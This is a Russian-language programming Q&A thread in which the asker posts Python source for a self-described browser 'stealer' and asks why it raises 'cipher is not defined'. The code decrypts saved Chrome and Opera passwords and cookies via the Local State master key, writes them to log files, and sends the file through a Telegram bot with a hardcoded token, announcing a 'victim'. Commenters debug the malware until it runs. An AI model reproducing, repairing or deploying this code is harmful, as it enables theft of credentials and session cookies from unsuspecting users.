# name 'cipher' is not defined /// python

Tags: python

Пишу стиллер по кускам с проектов гитхаба:

```
try:
    import time
    import telegram
    import shutil
    import json
    from base64 import b64decode
    from win32crypt import CryptUnprotectData
    from Crypto.Cipher import AES
    import os
    import sqlite3
    import win32api
    import datetime
    import requests
    import ctypes
    import string
    import subprocess
    from bs4 import BeautifulSoup
    import sys
    import urllib.request
    import re
    import glob
    from ctypes import wintypes
except Exception as e:
    print(e)
    pass



user_id = 786366032
token = '1451777182:AAE5yunZVWvliGRHvNx4SAAFlDH65rEcYbU'
today = datetime.datetime.today()
password_file = "log" + today.strftime("%Y-%m-%d-%H.%M.%S") + ".txt"
read_files = glob.glob("*.txt")

sendpath = 'C:\Temp'
url = "https://ifconfig.me/ip"
uf = urllib.request.urlopen(url)
html1 = uf.read()
html = re.sub("[b'()]", "", html1.decode('utf-8'))
passtext = "######################################" + "\n" + "########## Passwords of" + str(html) + " #######" + "\n" + "######################################" + "\n" + "\n"

LocalAppData = os.environ['LocalAppData'] + '\\'
AppData = os.environ['AppData'] + '\\'
FileName = 116444736000000000
NanoSeconds = 10000000



class DATA_BLOB(ctypes.Structure):
    _fields_ = [
        ('cbData', wintypes.DWORD),
        ('pbData', ctypes.POINTER(ctypes.c_char))
    ]







subprocess.Popen('@chcp 65001 1>nul', shell=True)



def GetBrowsers():
    Browsers = []

    for Browser in BrowsersPath:
        if os.path.exists(Browser):
            Browsers.append(Browser)

    return Browsers



def DecryptPayload(cipher, payload):
    return cipher.decrypt(payload)



def GenerateCipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)



def GetMasterKey(browserPath):
    fail = True

    for i in range(4):
        path = browserPath + '\\..' * i + '\\Local State'

        if os.path.exists(path):
            fail = False
            break

    if fail:
        return None

    with open(path, 'r', encoding='utf-8') as f:
        local_state = f.read()
        local_state = json_loads(local_state)

    master_key = b64decode(local_state['os_crypt']['encrypted_key'])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key)
    return master_key



def DecryptValue(buff, master_key=None):
    starts = buff.decode(encoding='utf-8', errors='ignore')[:3]

    if starts == 'v10' or starts == 'v11':
        iv = buff[3:15]
        payload = buff[15:]
        cipher = GenerateCipher(master_key, iv)
        decrypted_pass = DecryptPayload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass

    else:
        decrypted_pass = CryptUnprotectData(buff)
        return decrypted_pass



def FetchDataBase(target_db, sql=''):
    if not os.path.exists(target_db):
        return []

    tmpDB = os.getenv('TEMP') + 'info_' + ''.join(random.choice(ascii_lowercase) for i in range(random.randint(10, 20))) + '.db'
    shutil.copy2(target_db, tmpDB)
    conn = sql_connect(tmpDB)
    cursor = conn.cursor()
    cursor.execute(sql)
    data = cursor.fetchall()
    cursor.close()
    conn.close()

    try:
        os.remove(tmpDB)
    except:
        pass

    return data



BrowsersPath = (
    LocalAppData + 'Google\\Chrome\\User Data\\Default',
    AppData + 'Opera Software\\Opera Stable'
)



def GetPasswords():
    global credentials
    credentials = []
    ptext = "######################################" + "\n" + "########## Passwords of" + str(html) + " #######" + "\n" + "######################################" + "\n" + "\n"
    for browser in GetBrowsers():
        master_key = GetMasterKey(browser)
        database = FetchDataBase(browser + '\\Login Data', 'SELECT action_url, username_value, password_value FROM logins')

        for row in database:
            password = {
                'hostname': row[0],
                'login': row[1],
                'password': DecryptValue(row[2], master_key)
            }
            ptext += f'{hostname}|{login}|{password}\n' + '\n'
            with open("p_log.txt", "w", encoding="utf-8") as f:
                f.write(ptext)
            credentials.append(password)

    return credentials



def GetCookies():
    global credentials
    credentials = []
    ctext = "######################################" + "\n" + "########## Cookies of" + str(html) + " #######" + "\n" + "######################################" + "\n" + "\n"
    for browser in GetBrowsers():
        master_key = GetMasterKey(browser)
        database = FetchDataBase(browser + '\\Cookies', 'SELECT * FROM cookies')

        for row in database:
            cookie = {
                'value': DecryptValue(row[12], master_key),
                'hostname': row[1],
                'name': row[2],
                'path': row[4],
                'expires': row[5],
                'secure': bool(row[6])
            }
            ctext += f'{value}|{hostname}|{name}|{path}|{expires}|{secure}\n' + '\n'
            with open("c_log.txt", "w", encoding="utf-8") as f:
                f.write(ctext)
            credentials.append(cookie)

    return credentials



def merge_logs():
    try:
        with open(password_file, "wb") as outfile:
            for f in read_files:
                with open(f, "rb") as infile:
                    outfile.write(infile.read() + b'\n')
    except Exception as e:
        print("ERROR in merge_logs() func: " + repr(e))
        pass



def send_txt():
    try:
        f = open(password_file, 'rb')
        bot.sendDocument(user_id, document=f)
        bot.send_message(user_id, text="Жертва попалась на Money Mod Stealer (" + str(html) + ")!")
        print("***Пароли были отправлены через бота")
    except Exception as e:
        print("ERROR in send_txt() func: " + repr(e))
        pass



def logo():
    try:
        print(" /$$      /$$                                         /$$      /$$                 /$$  /$$$$$$   /$$                         /$$                    " + "\n" + "| $$$    /$$$                                        | $$$    /$$$                | $$ /$$__  $$ | $$                        | $$                    " + "\n" + "| $$$$  /$$$$  /$$$$$$  /$$$$$$$   /$$$$$$  /$$   /$$| $$$$  /$$$$  /$$$$$$   /$$$$$$$| $$  \__//$$$$$$    /$$$$$$   /$$$$$$ | $$  /$$$$$$   /$$$$$$ " + "\n" + "| $$ $$/$$ $$ /$$__  $$| $$__  $$ /$$__  $$| $$  | $$| $$ $$/$$ $$ /$$__  $$ /$$__  $$|  $$$$$$|_  $$_/   /$$__  $$ |____  $$| $$ /$$__  $$ /$$__  $$" + "\n" + "| $$  $$$| $$| $$  \ $$| $$  \ $$| $$$$$$$$| $$  | $$| $$  $$$| $$| $$  \ $$| $$  | $$ \____  $$ | $$    | $$$$$$$$  /$$$$$$$| $$| $$$$$$$$| $$  \__/" + "\n" + "| $$\  $ | $$| $$  | $$| $$  | $$| $$_____/| $$  | $$| $$\  $ | $$| $$  | $$| $$  | $$ /$$  \ $$ | $$ /$$| $$_____/ /$$__  $$| $$| $$_____/| $$      " + "\n" + "| $$ \/  | $$|  $$$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$| $$ \/  | $$|  $$$$$$/|  $$$$$$$|  $$$$$$/ |  $$$$/|  $$$$$$$|  $$$$$$$| $$|  $$$$$$$| $$      " + "\n" + "|__/     |__/ \______/ |__/  |__/ \_______/ \____  $$|__/     |__/ \______/  \_______/ \______/   \___/   \_______/ \_______/|__/ \_______/|__/      " + "\n" + "                                            /$$  | $$                                                                                                " + "\n" + "                                           |  $$$$$$/                                                                                                " + "\n" + "                                            \______/                                                                                                 ")
        time.sleep(10)
    except Exception as e:
        print("ERROR in logo() func: " + repr(e))
        pass




def main():
    try:
        GetBrowsers()
        DecryptPayload()
        GenerateCipher()
        GetMasterKey()
        DecryptValue()
        FetchDataBase()
        GetPasswords()
        GetCookies()
        merge_logs()
        send_txt()
    except Exception as e:
        print(e)
        pass


if __name__ == '__main__':
    main()
    print("Успешно!")
```

Возникает следующая ошибка:

```
name 'cipher' is not defined
```

Вещи с данной переменной написал не сам, а взял из другого проекта (в некоторых местах допиливал, но без участия этой переменной), так как сам по этой части не шарю.

UPD: оно как-то поменялось и теперь выдаёт вот эту ошибку

```
DecryptPayload() missing 2 required positional arguments: 'cipher' and 'payload'
```

скорее всего либо сам decryptpayload либо функция main , строку почему-то не выбивает

Comment: на какой строке происходит ошибка?

Comment: Добавьте в вопрос полный стек с ошибкой (ссылка `править` под вопросом)

Comment: в ошибке я скинул всё что вылезло, скорее всего мало инфы из-за кода, щяс посмотрю что мешает полную ошибку вывести

Comment: @gil9red поправил что теперь есть, строку почему-то всё равно не пишет

Comment: @AlexProgd, вы неправильно исключения выводите. Вы либо их вообще не ловите и питон выведен полный стек, либо используйте `traceback`, это модуль `print(traceback.format_exc())`

Comment: @AlexProgd, у вас функция объявлена так: `def DecryptPayload(cipher, payload):` а вызываете так `DecryptPayload()`, т.е. нет двух параметров, которые нужно в функцию передавать

Answer (score 0, accepted):

```
def DecryptPayload(cipher, payload): # два параметра: cipher, payload
    return cipher.decrypt(payload)

def main():
    try:
        GetBrowsers()
        DecryptPayload() # нет переданных параметров
```

Вы вызываете тут функцию `DecryptPayload` без параметров, а описана она как принимающая на вход два параметра.

Судя по логике программы, вам вообще не надо в `main` вызывать эту функцию, она вызывается через другие функции, там это делается с нужными параметрами.

Comment: когда добавляю пишет *параметр* is not defined

Comment: @AlexProgd Да вам вообще в `main` не нужно её вызывать, насколько я понимаю

Comment: понял, ошибка исправлена, спасибо